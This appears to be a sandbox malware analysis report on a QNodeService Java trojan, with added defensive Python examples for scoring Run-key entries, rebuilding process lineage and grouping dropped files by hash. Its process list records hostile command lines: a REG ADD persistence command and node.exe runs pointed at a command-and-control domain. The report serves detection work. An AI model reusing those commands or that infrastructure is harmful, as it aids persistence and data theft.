Malware Analysis Report

2024-10-19 10:30

Sample ID 201005-v3f4zxbrka
Target 2b5e8601ebef2e9c3b82bfc71f4d9c60.jar
SHA256 eec063e54c4eb818e568bde4f742efb075c691a9201d974291c6767bac7c20a1
Tags
persistence trojan qnodeservice spyware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

eec063e54c4eb818e568bde4f742efb075c691a9201d974291c6767bac7c20a1

Threat Level: Known bad

The file 2b5e8601ebef2e9c3b82bfc71f4d9c60.jar was found to be: Known bad.

Malicious Activity Summary

persistence trojan qnodeservice spyware

QNodeService

Executes dropped EXE

Loads dropped DLL

Reads user/profile data of web browsers

Adds Run key to start application

JavaScript code in executable

Looks up external IP address via web service

Checks processor information in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2020-10-05 13:15

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2020-10-05 13:15

Reported

2020-10-05 13:17

Platform

win7v200722

Max time kernel

9s

Max time network

15s

Command Line

java -jar C:\Users\Admin\AppData\Local\Temp\2b5e8601ebef2e9c3b82bfc71f4d9c60.jar

Signatures

N/A

Processes

C:\Windows\system32\java.exe

java -jar C:\Users\Admin\AppData\Local\Temp\2b5e8601ebef2e9c3b82bfc71f4d9c60.jar

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2020-10-05 13:15

Reported

2020-10-05 13:17

Platform

win10v200722

Max time kernel

106s

Max time network

135s

Command Line

java -jar C:\Users\Admin\AppData\Local\Temp\2b5e8601ebef2e9c3b82bfc71f4d9c60.jar

Signatures

QNodeService [trojan qnodeservice]

Reads user/profile data of web browsers [spyware]

Adds Run key to start application [persistence]

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | C:\Windows\system32\reg.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run\fc82d951-8a6d-40f7-8c5e-ade60e7d5946 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" | C:\Windows\system32\reg.exe | N/A
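The Run-key entry above is user-scoped (HKCU, so no elevation was needed), is named with a bare GUID, and chains cmd.exe into a VBScript under the user's profile. The following is an added Python example, not code from the report or from the sample, that parses the reg.exe command line shown in the Processes section and scores such entries the way an analyst reads this signature; the weights, FLAG_THRESHOLD and the OneDrive comparison entry are this example's own assumptions.

```python
"""Score a Run-key autostart entry (added example; not part of the sandbox report).

REG_ADD_CMDLINE is the reg.exe command line from this report. BENIGN_ENTRY is a
constructed, legitimate-looking per-user entry used for contrast. Weights and the
flag threshold are assumptions of this example.
"""
import re

GUID_RE = re.compile(r"^\{?[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}\}?$", re.I)
SCRIPT_EXT = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".hta", ".ps1", ".bat", ".cmd")
INTERPRETERS = {"cmd", "cmd.exe", "wscript", "wscript.exe", "cscript", "cscript.exe",
                "powershell", "powershell.exe", "mshta", "mshta.exe", "rundll32", "rundll32.exe"}
PROFILE_RE = re.compile(r"^[A-Z]:\\Users\\[^\\]+\\", re.I)
FLAG_THRESHOLD = 4  # assumption: at or above this the entry is worth a human look


def split_windows_cmdline(cmdline):
    """Tokenize a Windows command line: double quotes group, \\" is a literal quote,
    and every other backslash (path separators) is kept as-is."""
    tokens, cur, in_quotes, i = [], [], False, 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == "\\" and i + 1 < len(cmdline) and cmdline[i + 1] == '"':
            cur.append('"')
            i += 2
            continue
        if ch == '"':
            in_quotes = not in_quotes
        elif ch.isspace() and not in_quotes:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
        i += 1
    if cur:
        tokens.append("".join(cur))
    return tokens


def parse_reg_add(cmdline):
    """Extract (key, value name, value data) from a 'REG ADD <key> /V <name> /D <data>' line."""
    toks = split_windows_cmdline(cmdline)
    if len(toks) < 3 or toks[0].upper() != "REG" or toks[1].upper() != "ADD":
        raise ValueError("not a REG ADD command line")
    key, name, data = toks[2], None, None
    i = 3
    while i < len(toks):
        flag = toks[i].upper()
        if flag in ("/V", "/D", "/T") and i + 1 < len(toks):
            if flag == "/V":
                name = toks[i + 1]
            elif flag == "/D":
                data = toks[i + 1]
            i += 2
        else:
            i += 1  # /F and other flags that take no argument
    return key, name, data


def score_run_entry(name, data):
    """Return (score, reasons) for one Run-key value; higher means more suspicious."""
    score, reasons = 0, []
    toks = split_windows_cmdline(data or "")
    if not toks:
        return 0, ["empty value data"]
    image = toks[0].rsplit("\\", 1)[-1].lower()
    if GUID_RE.match(name or ""):
        score += 2
        reasons.append("value name is a bare GUID instead of a product name")
    if image in INTERPRETERS:
        score += 2
        reasons.append(f"launched through {image} rather than directly")
    for tok in toks:
        if "\\" not in tok:
            continue
        if tok.lower().endswith(SCRIPT_EXT):
            score += 3
            reasons.append(f"runs a script: {tok}")
        if PROFILE_RE.match(tok):
            score += 1
            reasons.append(f"payload under a user profile: {tok}")
    return score, reasons


def is_suspicious(name, data):
    return score_run_entry(name, data)[0] >= FLAG_THRESHOLD


# reg.exe command line as listed in this report's Processes section.
REG_ADD_CMDLINE = (r'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" '
                   r'/V "fc82d951-8a6d-40f7-8c5e-ade60e7d5946" /t REG_SZ /F '
                   r'/D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""')
# Constructed benign-looking entry (assumption, not from the report).
BENIGN_ENTRY = ("OneDrive",
                r'"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background')

if __name__ == "__main__":
    _, name, data = parse_reg_add(REG_ADD_CMDLINE)
    for label, (n, d) in (("report", (name, data)), ("benign", BENIGN_ENTRY)):
        s, why = score_run_entry(n, d)
        print(f"{label}: {n!r} score={s} flagged={s >= FLAG_THRESHOLD}")
        for r in why:
            print("   -", r)
```

The user-profile heuristic on its own also fires on legitimate per-user installs (the constructed OneDrive entry scores 1), which is why it carries the lowest weight; a GUID-named value that hands a script under the profile to cmd.exe is what separates the entry in this report from those.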

JavaScript code in executable

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | wtfismyip.com | N/A | N/A

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 3816 wrote to memory of 3376 | N/A | C:\ProgramData\Oracle\Java\javapath\java.exe | C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
PID 3376 wrote to memory of 3688 | N/A | C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe | C:\Users\Admin\node-v14.12.0-win-x64\node.exe
PID 3688 wrote to memory of 2792 | N/A | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | C:\Users\Admin\node-v14.12.0-win-x64\node.exe
PID 2792 wrote to memory of 3036 | N/A | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | C:\Users\Admin\node-v14.12.0-win-x64\node.exe
PID 3036 wrote to memory of 3616 | N/A | C:\Users\Admin\node-v14.12.0-win-x64\node.exe | C:\Windows\system32\cmd.exe
PID 3616 wrote to memory of 3700 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\reg.exe
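Every write in this table goes from a parent into the process it has just created, and the same pairs appear in order in the Processes list below, so the table is effectively the spawn lineage rather than injection into a foreign process: java.exe re-launches the JAR under javaw.exe, javaw.exe starts node.exe with `-` (Node then reads its script from stdin, so that stage never exists as a file), node.exe re-executes itself with boot.js, and cmd.exe/reg.exe write the Run key. The sandbox reports each write twice. The following is an added Python example, not part of the report, that de-duplicates the rows and rebuilds that tree; WPM_ROWS is the table copied as the sandbox emitted it, including the duplicate rows.

```python
"""Rebuild process lineage from 'PID X wrote to memory of Y' rows (added example).

WPM_ROWS is the WriteProcessMemory table from this report as the sandbox listed it
(each row twice). The parser, tree builder and renderer are this example's own.
"""
import re
from collections import defaultdict

# src image is matched lazily so that paths containing spaces ("Program Files")
# still split correctly on the ".exe <drive>:\" boundary between the two paths.
ROW_RE = re.compile(
    r"^PID (?P<src>\d+) wrote to memory of (?P<dst>\d+) N/A "
    r"(?P<src_image>.+?\.exe) (?P<dst_image>[A-Za-z]:\\.+\.exe)$")

WPM_ROWS = r"""
PID 3816 wrote to memory of 3376 N/A C:\ProgramData\Oracle\Java\javapath\java.exe C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
PID 3816 wrote to memory of 3376 N/A C:\ProgramData\Oracle\Java\javapath\java.exe C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
PID 3376 wrote to memory of 3688 N/A C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe C:\Users\Admin\node-v14.12.0-win-x64\node.exe
PID 3376 wrote to memory of 3688 N/A C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe C:\Users\Admin\node-v14.12.0-win-x64\node.exe
PID 3688 wrote to memory of 2792 N/A C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\node-v14.12.0-win-x64\node.exe
PID 3688 wrote to memory of 2792 N/A C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\node-v14.12.0-win-x64\node.exe
PID 2792 wrote to memory of 3036 N/A C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\node-v14.12.0-win-x64\node.exe
PID 2792 wrote to memory of 3036 N/A C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\node-v14.12.0-win-x64\node.exe
PID 3036 wrote to memory of 3616 N/A C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Windows\system32\cmd.exe
PID 3036 wrote to memory of 3616 N/A C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Windows\system32\cmd.exe
PID 3616 wrote to memory of 3700 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3616 wrote to memory of 3700 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
"""


def parse_rows(text):
    """Return de-duplicated, order-preserving (src_pid, dst_pid, src_image, dst_image) edges."""
    seen, edges = set(), []
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue  # tolerate stray lines (headers, blanks)
        edge = (int(m["src"]), int(m["dst"]), m["src_image"], m["dst_image"])
        if edge not in seen:
            seen.add(edge)
            edges.append(edge)
    return edges


def build_tree(edges):
    """Map writer PID -> written PIDs, PID -> image path, and the PIDs nobody wrote into (roots)."""
    children, images = defaultdict(list), {}
    for src, dst, src_image, dst_image in edges:
        children[src].append(dst)
        images.setdefault(src, src_image)
        images.setdefault(dst, dst_image)
    written_into = {dst for _, dst, _, _ in edges}
    roots = [pid for pid in images if pid not in written_into]
    return children, images, roots


def lineage(edges):
    """Depth-first list of (depth, pid, image) from each root."""
    children, images, roots = build_tree(edges)
    out = []

    def walk(pid, depth):
        out.append((depth, pid, images[pid]))
        for child in children.get(pid, []):
            walk(child, depth + 1)

    for root in roots:
        walk(root, 0)
    return out


def chain_string(edges):
    """Compact 'java.exe > javaw.exe > ...' rendering using image basenames."""
    return " > ".join(image.rsplit("\\", 1)[-1] for _, _, image in lineage(edges))


def same_image_hops(edges):
    """Writer and target share an image: here node.exe re-executing itself with boot.js."""
    return [(s, d) for s, d, si, di in edges if si.lower() == di.lower()]


if __name__ == "__main__":
    edges = parse_rows(WPM_ROWS)
    for depth, pid, image in lineage(edges):
        print("  " * depth + f"{pid} {image}")
    print(chain_string(edges))
```

The chain itself is the indicator worth alerting on: a Java launcher that ends in node.exe spawning cmd.exe and reg.exe is not a pattern a legitimate JAR produces, whereas a parent writing into its own child is exactly what every CreateProcess looks like to a WriteProcessMemory hook.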

Processes

C:\ProgramData\Oracle\Java\javapath\java.exe

java -jar C:\Users\Admin\AppData\Local\Temp\2b5e8601ebef2e9c3b82bfc71f4d9c60.jar

C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe

"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\5aae1218.tmp

C:\Users\Admin\node-v14.12.0-win-x64\node.exe

C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain qwertyhills92.spdns.org

C:\Users\Admin\node-v14.12.0-win-x64\node.exe

C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_htdGq2\boot.js --hub-domain qwertyhills92.spdns.org

C:\Users\Admin\node-v14.12.0-win-x64\node.exe

C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_htdGq2\boot.js --hub-domain qwertyhills92.spdns.org

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "fc82d951-8a6d-40f7-8c5e-ade60e7d5946" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""

C:\Windows\system32\reg.exe

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "fc82d951-8a6d-40f7-8c5e-ade60e7d5946" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""

Network

Country | Destination | Domain | Proto
N/A | 8.8.8.8:53 | nodejs.org | udp
N/A | 104.20.22.46:443 | nodejs.org | tcp
N/A | 8.8.8.8:53 | qwertyhills92.spdns.org | udp
N/A | 79.110.52.145:443 | qwertyhills92.spdns.org | tcp
N/A | 79.110.52.145:443 | qwertyhills92.spdns.org | tcp
N/A | 79.110.52.145:443 | qwertyhills92.spdns.org | tcp
N/A | 79.110.52.145:443 | qwertyhills92.spdns.org | tcp
N/A | 8.8.8.8:53 | wtfismyip.com | udp
N/A | 95.217.228.176:443 | wtfismyip.com | tcp

Files

memory/3376-51-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5aae1218.tmp

MD5 2b5e8601ebef2e9c3b82bfc71f4d9c60
SHA1 678237fe0071f9ee54c756d71f2e2fc655a27c60
SHA256 eec063e54c4eb818e568bde4f742efb075c691a9201d974291c6767bac7c20a1
SHA512 2db0e8586843c48a4cabfbac44d522f9ad94ec55c0d721b3faa5856a4d68e118105d5a3b3800ebe55b1b61913a24601595aa05de266099d19e3ee0656cc45a10

C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/3688-167-0x0000000000000000-mapping.dmp

C:\Users\Admin\node-v14.12.0-win-x64\node.exe

MD5 f0b11a5823c45fc2664e116dc0323bcb
SHA1 612339040c1f927ec62186cd5012f4bb9c53c1b9
SHA256 16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
SHA512 0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

memory/3688-171-0x00000256FF940000-0x00000256FF941000-memory.dmp

memory/2792-172-0x0000000000000000-mapping.dmp

C:\Users\Admin\node-v14.12.0-win-x64\node.exe

MD5 f0b11a5823c45fc2664e116dc0323bcb
SHA1 612339040c1f927ec62186cd5012f4bb9c53c1b9
SHA256 16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
SHA512 0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

memory/2792-174-0x0000034BD4B00000-0x0000034BD4B01000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_qhub_node_htdGq2\boot.js

MD5 c686d5fcf94d07f7cee70109eba9c4d3
SHA1 588eee04fdbf1fa372c8389c66d581e0b37afd7e
SHA256 e7e4897c0bbcd7e2931011f7839a0ebe920dc14e116fb898fc5e318827dc425d
SHA512 5af3b52daafe41bf891dcd846c3b8c15c04d1da2cdb28c915cf970f2fbe3d7bba6b6fc7c291a431a2d0a437f159322401eb8aa567a146763d665ca76677853a3

memory/3036-176-0x0000000000000000-mapping.dmp

C:\Users\Admin\node-v14.12.0-win-x64\node.exe

MD5 f0b11a5823c45fc2664e116dc0323bcb
SHA1 612339040c1f927ec62186cd5012f4bb9c53c1b9
SHA256 16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
SHA512 0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

memory/3036-178-0x000001AF91C00000-0x000001AF91C01000-memory.dmp

memory/3616-179-0x0000000000000000-mapping.dmp

memory/3700-180-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\3036-66084817d3b82bee.node

MD5 2e20508eac344dfead52bdc25b73a7fb
SHA1 c2918d63d3c0f14dce0552530ef0793f3a76bfa7
SHA256 500e8c83a3d455c26d20fb32e02c26a47a6c7fa906ce2c0491729b731906ac98
SHA512 25f8c95eb38a39e7ea60145e598f8e00b3b4c61f9ef6ae1689d3be16da7bd7c0d57a55d0d06a8402af694be880408ca6ef01829b79d9768d09967db5e3a2b8de

\Users\Admin\AppData\Local\Temp\3036-78babbdd958fedd1.node

MD5 df45601340083518d8bcc10ec848460b
SHA1 8613d6ab3040d57d241ed4a466c1fffb1b12455b
SHA256 eebfd03defaa0965393ebde5cd45a982dda75c82d5205a702f88deec660723ed
SHA512 0e1e14dd82119dc822dccc4da4d64cce62a7796ec1157defa97b4bc29d767d164e6ef65861448b24c4972cc3919bf1583518ba725757c0f96af47a942380cd41

\Users\Admin\AppData\Local\Temp\3036-0f142030f8b3a34f.node

MD5 4e2dd4f7e4bddd4d772390d91bb80b4e
SHA1 d664d431a5efd2df79c6a0c80b46924ff143c92a
SHA256 5ac59bf615e2cbfea38b0f68d82cbb47e729af688960b4334895030572553367
SHA512 c01f221b80e2d3f03c5fa1862814734d2cca7e742b248a97dbb8958fe93b54369924b3968f600938df8bd0a41c33cd41e229198fafcbd65ea67940e707be05da

\Users\Admin\AppData\Local\Temp\3036-19b5bb8f5a24d742.node

MD5 ee6e80bab410c751c935e6175acf8b5c
SHA1 c44cad6425db5c9c86351f9f9f7b019b876db528
SHA256 dd3bd6107fb87be3c34985df2a8a0645fa7a89172d23ddb66fec64c3236a1af3
SHA512 c654c44cfe115a9c4f9eaf6ed4207511c17dc4eeb00441c2be6413d0a16c348fce0dcf282f2b9132948150e3541d248edd62b2e055a1cd902f80b9a67d2e1d77

\Users\Admin\AppData\Local\Temp\3036-e75094ceb677a8b5.node

MD5 87f2661da9a09dc36a1e39b53692e172
SHA1 fc6a37bfcd72d7d70a3afb6fbd752bf1e0b0990f
SHA256 7d2532530cd09d589348e1d6c2a46af4d3de73ee72941a4ee5b65cd21c17ddea
SHA512 7187b2761245b470f4dbdbaa258e8d3cc1f2491bea2f7649212d8abcef1ccfb4c4b7fe4d0a37ca47840dd21eea9d799c94367af43c98027ba6f1247162a9e713

\Users\Admin\AppData\Local\Temp\3036-33c9a6e061a3d471.node

MD5 f1c9cde23537dc338fb765f2c125f994
SHA1 6f290977d6e0666c4798b4bc17f640a18598a772
SHA256 8f73b3d91365fc1a09da9e8029a47f8ad5dd24d0dab03b01cd50de5806c8fb6b
SHA512 1bbdd3e50d4bcd09ca8e107596497ff3b20d82d728d485ca6eb1ee8660de0c3f4fe24dcc1657f2f59bc4f99fa2ddd525a0446eaed7999ed23b34fe8963750307
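Grouping the listing above by hash makes two things visible that the flat list hides: Temp\5aae1218.tmp carries exactly the digests of the submitted JAR (the sample re-launches a copy of itself under javaw.exe, as the Processes section shows), and the .oracle_jre_usage timestamp is an empty file (its SHA256 is the digest of zero bytes). The three node.exe entries are one binary listed three times, and the six Temp\3036-*.node files, named after PID 3036 (the node.exe instance running boot.js), are Node native addons. The following is an added Python example, not part of the report, that groups such a listing by SHA256; FILES_LISTING is a constructed excerpt of the section above with only the SHA256 lines kept, and sha256_of_file is there for matching artefacts recovered from a host against it.

```python
"""Group a sandbox dropped-file listing by content hash (added example).

FILES_LISTING is a constructed excerpt of this report's Files section (same paths
and SHA256 values; MD5/SHA1/SHA512 lines dropped for brevity). SAMPLE_SHA256 is the
submitted JAR's hash from the report header.
"""
import hashlib
import re
from collections import defaultdict

SAMPLE_SHA256 = "eec063e54c4eb818e568bde4f742efb075c691a9201d974291c6767bac7c20a1"
EMPTY_FILE_SHA256 = hashlib.sha256(b"").hexdigest()  # e3b0c442...b855
DIGEST_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512) ([0-9a-fA-F]+)$")

FILES_LISTING = r"""
memory/3376-51-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5aae1218.tmp
SHA256 eec063e54c4eb818e568bde4f742efb075c691a9201d974291c6767bac7c20a1
C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
C:\Users\Admin\node-v14.12.0-win-x64\node.exe
SHA256 16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
C:\Users\Admin\node-v14.12.0-win-x64\node.exe
SHA256 16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
C:\Users\Admin\AppData\Local\Temp\_qhub_node_htdGq2\boot.js
SHA256 e7e4897c0bbcd7e2931011f7839a0ebe920dc14e116fb898fc5e318827dc425d
C:\Users\Admin\node-v14.12.0-win-x64\node.exe
SHA256 16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
\Users\Admin\AppData\Local\Temp\3036-66084817d3b82bee.node
SHA256 500e8c83a3d455c26d20fb32e02c26a47a6c7fa906ce2c0491729b731906ac98
\Users\Admin\AppData\Local\Temp\3036-78babbdd958fedd1.node
SHA256 eebfd03defaa0965393ebde5cd45a982dda75c82d5205a702f88deec660723ed
\Users\Admin\AppData\Local\Temp\3036-0f142030f8b3a34f.node
SHA256 5ac59bf615e2cbfea38b0f68d82cbb47e729af688960b4334895030572553367
\Users\Admin\AppData\Local\Temp\3036-19b5bb8f5a24d742.node
SHA256 dd3bd6107fb87be3c34985df2a8a0645fa7a89172d23ddb66fec64c3236a1af3
\Users\Admin\AppData\Local\Temp\3036-e75094ceb677a8b5.node
SHA256 7d2532530cd09d589348e1d6c2a46af4d3de73ee72941a4ee5b65cd21c17ddea
\Users\Admin\AppData\Local\Temp\3036-33c9a6e061a3d471.node
SHA256 8f73b3d91365fc1a09da9e8029a47f8ad5dd24d0dab03b01cd50de5806c8fb6b
"""


def parse_files(text):
    """Return [(path, {algo: digest})] in listing order; memory-dump lines are skipped."""
    entries = []
    for line in text.strip().splitlines():
        line = line.strip()
        if not line or line.startswith("memory/"):
            continue
        m = DIGEST_RE.match(line)
        if m and entries:
            entries[-1][1][m.group(1)] = m.group(2).lower()
        elif not m:
            entries.append((line, {}))
    return entries


def group_by_sha256(entries):
    groups = defaultdict(list)
    for path, digests in entries:
        if "SHA256" in digests:
            groups[digests["SHA256"]].append(path)
    return dict(groups)


def triage(entries, sample_sha256=SAMPLE_SHA256):
    """Summarise what the hash groups say about the drop set."""
    groups = group_by_sha256(entries)
    return {
        "copies_of_sample": groups.get(sample_sha256, []),
        "empty_files": groups.get(EMPTY_FILE_SHA256, []),
        "repeated_binaries": {h: p for h, p in groups.items()
                              if len(p) > 1 and h != sample_sha256},
        "native_addons": sorted(p for p, _ in entries if p.lower().endswith(".node")),
        "unique_hashes": len(groups),
    }


def sha256_of_file(path, chunk=1 << 20):
    """Chunked SHA256 of a file on disk, for matching a host artefact against the listing."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


if __name__ == "__main__":
    for key, value in triage(parse_files(FILES_LISTING)).items():
        print(f"{key}: {value}")
```

When sweeping hosts, the hashes to pivot on are boot.js and the six .node addons; node.exe itself is an unmodified runtime that the sample fetched from nodejs.org (see the Network table), so its hash will also match legitimate installs.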